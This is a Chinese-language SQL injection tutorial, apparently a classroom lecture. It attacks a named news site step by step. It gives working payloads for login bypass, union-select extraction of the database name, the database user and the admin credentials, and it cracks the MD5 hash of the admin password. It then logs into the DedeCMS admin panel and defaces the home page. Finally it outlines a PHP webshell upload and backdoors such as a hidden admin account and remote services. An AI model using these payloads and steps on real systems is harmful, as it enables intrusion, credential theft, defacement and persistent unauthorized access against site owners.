比如：在用户名输入框中输入:’or 1=1#,密码随便输入，这时候的合成后的SQL查询语句为：

select * from users where username='' or 1=1#' and password=md5('')

语义分析：“#”在mysql中是注释符，这样井号后面的内容将被mysql视为注释内容，这样就不会去执行了，换句话说，以下的两句sql语句等价：

select * from users where username='' or 1=1#' and password=md5('')

等价于

select * from users where username='' or 1=1

因为1=1永远都是成立的，即where子句总是为真，将该sql进一步简化之后，等价如下select语句：

select * from users

没错，该sql语句的作用是检索users表中的所有字段

果不其然，我们利用万能语句(’or 1=1#)能够登录！看到了吧，一个经构造后的sql语句竟有如此可怕的破坏力，相信你看到这后，开始对sql注入有了一个理性的认识了吧~

二、实战演练

OK,前面铺垫了那么多，算是给大家科普了，

现在我们进行第二讲，实战演练。开始之前呢，有一个互动环节。现在请大家用自己的手机登录 www.guoshang.tk 这个网址，简单看下。待会等我们注入攻击之后，再次登录，好对比效果，对于sql注入攻击有一个更加直观的认识。

（一）积极备战

1。首先设置浏览器，工具--internet选项--安全--找到“显示友好的http信息”,把前面的勾去掉；

2。打开谷歌，寻找注入点。为了节省时间，这里我已经事先找好目标点

www.guoshang.tk；

谷歌搜索小技巧：筛选关键字：“inurl:/news/read.php?id=”

（二）狼烟四起

1。我们打开这个网址，一个新闻网站，,我们点击[百家争鸣]板块，这是一个国内外新闻速览的栏目，好多时政的帖子，我们点击一个，OK，现在进入单个帖子界面，首先我们看下当前帖子的URL地址，

www.guoshang.tk/news/read.php?id=50

可以看出这是一个动态URL，也就是说可以在地址栏中传参，这是SQL注入的基本条件。

2。判断是否存在sql注入可能。在帖子地址后面空上一格，敲入 and 1=1 ,然后 and 1=2 。这两句什么意思呢？一个恒等式，一个恒不等式，敲入 and 1=1 帖子返回正常， and 1=2 时帖子返回出错，说明sql语句被执行，程序没有对敏感字符进行过滤。现在我们可以确定此处是一个SQL注入点，程序对带入的参数没有做任何处理，直接带到数据库的查询语句中。可以推断出在访问

www.guoshang.tk/news/read.php?id=50

时数据库中执行的SQL语句大概是这样的：

Select * from [表名] where id=50

添加and 1=1后的SQL语句：

Select * from [表名] where id=50 and 1=1

由于条件and 1=1永远为真，所以返回的页面和正常页面是一致的

添加and 1=2后的SQL语句：

Select * from [表名] where id=50 and 1=2

由于条件1=2永远为假，所以返回的页面和正常页面不一致

3。爆数据库。确定注入点仅仅意味着开始。现在，我们回到原先的帖子地址：

www.guoshang.tk/news/read.php?id=50

现在要判断数据库类型以及版本，构造语句如下：

www.guoshang.tk/news/read.php?id=50 and ord(mid(version(),1,1))>51

发现返回正常页面，说明数据库是mysql，并且版本大于4.0，支持union查询，反之是4.0

以下版本或者其他类型数据库。

4。爆字段。接着我们再构造如下语句来猜表中字段：

a. www.guoshang.tk/news/read.php?id=50 order by 10

返回错误页面，说明字段小于10

b. www.guoshang.tk/news/read.php?id=50 order by 5

返回正常页面，说明字段介于5和10之间

c. www.guoshang.tk/news/read.php?id=50 order by 7

返回错误页面，说明字段大于5小于7，可以判断字段数是6.下面我们再来确认一下

d. www.guoshang.tk/news/read.php?id=50 order by 6

返回正常页面，说明字段确实是6这里采用了“二分查找法”，这样可以减少判断次数，节省时间。如果采用从order by 1依次增加数值的方法来判断，需要7次才可以确定字段数，采用“二分查找法”只需要4次就够。当字段数很大时，二分查找法的优势更加明显，效率更高。

5。爆表.确定字段之后现在我们要构造联合查询语句(union select )，语句如下：

www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,3,4,5,6

我们来看帖子页面，原先内容没有了，取而代之的是返回给了我们三个数字，分别是3，5，6 我们随便选择一个，这里的3，5，6指的是我们可以把联合查询的对应位置替换为我们想要查询的关键字，比如版本，数据库名称，主要是用来探测web系统的信息。

6。爆用户名、密码。我们选择3 吧，OK,现在把3给替换掉，先查询下数据库库名，构造语句如下

www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,database(),4,5,6

浏览器给我们返回了 xinwen 。说明这个网站的数据库库名是 xinwen .

现在我们用同样的手法查询下管理员信息，构造语句如下：

www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,user(),4,5,6

返回 root@localhost ，是个管理员权限。

现在我们再用同样的手法查询用户名，密码，构造语句如下：

www.guoshang.tk/news/read.php?id=50 and 1=2 union select

1,2,username,4,5,6 from admin

返回 admin

www.guoshang.tk/news/read.php?id=50 and 1=2 union select 1,2,password,4,5,6 from admin

返回 B2E5B76793EDA747382E81391AA3A400

7。md5解密。看到这里，有的同学可能会有点紧张。其实返回的这个是字符串密码经过32位md5加密后的值。上次李翊大帝给我们复习的时候讲过加密与解密。也稍稍提到了md5 摘要算法，不可逆。话虽如此，现在互联网上crack md5 “解密”md5 的网站很多，这里我给解密加了引号，是因为其“解密”原理是 md5 值既然不能进行逆向破解，但是同样的字符串经过同样的md5加密算法所生成的md5值是一样的，我们可以重新构造字符串生成md5值，然后对比两个值，如果一样则字符串一样。有人说，这种方法岂不是海底捞针，试到猴年马月去啊，其实不然，互联网云时代已经到来，大数据的信息挖掘以及分布式运算可以解决很多类似大运算量的问题。我们现在就要来对这个md5值进行比对，有好多网站提供这种服务，我们找一个。（www.md5.com.cn ）这个网址，我们把这个值复制进去，然后点击“MD5 CRACK“，“解密”时间，视密码复杂度而定，OK，结果出来，(chinaadmin)

8。登录后台。现在我们已经拿到网站的管理员帐号密码，感谢上帝，一路顺风，但还不能高兴得太早。很多情况是你虽然拿到了钥匙，但是找不到门。下面我们就来找一下门，找之前要有个基本思路：

①先试下几个比较常用的目录；

②不行的话，因为这个论坛程序是dedecms5.6 ，所以我们就到织梦官方，下载一套同样程序，分析网站管理路径，或者直接百度“dedecms默认管理界面”即可，下载步骤可省略；

③手工不通，借力工具。明小子，啊D，御剑，都可以。

9。这里我们发现此网站依然采用程序默认管理路径：

www.guoshang.tk/dede

输入用户名 admin ，密码 chinaadmin 成功登入。

接下来，我们找到【核心】--【附件管理】--【文件式管理器】--这时我们可以看到网站根目录下所有目录以及文件，下标栏还有几个功能选项，我们可以看到网站首页文件【index.html】，点击【修改】，进入网页源代码编辑模式，删除所有源码(这招有点毒，劝告别改人家的源码，建议新建一个文件)，留个言，表示到此一游。

卑鄙是卑鄙者的通行证，高尚是高尚者的墓志铭----- 北岛

现在是见证奇迹的时刻！请大家再次登录这个网站，有没有把你和你的小伙伴们惊呆呢？！

至此，战斗结束。若干年的免费住宿，一日三餐在向你招手。。。

三、扩展部分

鉴于此讲内容危害性较大，不予演示。只简述其流程。

（一）webshell提权

二讲结束，我们仅仅取得网站管理员权限，操作范围仅限当前网站。革命尚未成功，同志仍需努力。若想深入挖掘，则必须寻求更大突破。获得网站webshell .

①准备一个php网马。（网上泛滥成灾，自己下载。但要注重分辨，小心螳螂捕蝉黄雀在后）;

②登录网站后台--【核心】--【附件管理】--【文件式管理器】--选择下标栏中的【文件上传

选项，上传我们实现准备的php网马文件（tarena.php）；

③上传完毕，点击预览，记录下url地址。新建浏览器窗口，复制粘贴，打开之后，可以看到我们的网马成功挂载，输入密码tarena(密码可以自行用记事本打开修改编辑)；

④进入网马管理界面，你会被那华丽丽的操作选项惊呆了！（取决网马水平，小马就别谈了，这里指的是大马）。从程序目录-网站根目录-各种强大的功能，乃至直接操作服务器磁盘文件，获取各种系统信息，跃马扬鞭，如入无人之境。其破坏力之大，令人咂舌！所以拜托各位亲，一定要盗亦有道，手下留情，除了靠法律监管，也要靠个人道德约束。

（二）暗修栈道

浴血奋战、攻城拔寨之后，怎样保卫来之不易的胜利果实？政治治大国若烹小鲜，入侵则烹小鲜如治大国。为长远计，我们需要建立一种长期和肉鸡保持联系的机制。而且还要很隐蔽，毕竟这是见不得光的。留后门的方法诸多：

①开启telnet服务

建立匿名账户，添加至超级管理员组；

②开启远程终端服务；

③自制木马触发事件...

因系统平台而异，这里不再赘言。

后注：①可能有读者会觉得此文很假，的确，鉴于篇幅问题，文中目标站点是我事先踩点过的，所以才

会一路凯歌，事实上很少会有站点会如此理想，但万变不离其宗，只是时间问题罢了。

②文中所述演示环境建立在同时满足两个条件下：

1.php配置文件中魔术引号已关闭；

2.建站程序中没有对用户输入字符进行过滤。